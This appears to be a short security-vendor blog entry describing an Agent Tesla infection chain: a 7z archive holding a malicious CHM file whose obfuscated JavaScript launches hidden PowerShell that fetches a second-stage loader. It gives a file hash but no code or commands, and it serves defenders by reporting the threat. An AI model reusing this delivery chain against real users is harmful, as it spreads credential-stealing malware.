Malicious Compiled HTML Help File Delivering Agent Tesla
The initial attack sent a 7zip compressed file named ORDER OF CONTRACT-pdf.7z, which contained the single malicious compiled HTML help file ORDER OF CONTRACT-pdf.chm (SHA256: 081fd54d8d4731bbea9a2588ca53672feef0b835dc9fa9855b020a352819feaa).
The file contains obfuscated JavaScript that is executed when the file is opened.
When the Javascript code in turn executes obfuscated PowerShell code which is executed in the background when the file is opened.
The powershell payload downloads a second stage payload from the internet, which is a powershell loader.
When the powershell loader is run, it in turn loads Agent Tesla to memory.
Featured Resources
Subscribe to Our Blog
Subscribe now to get the latest insights, expert tips and updates on threat exposure validation.
Subscribe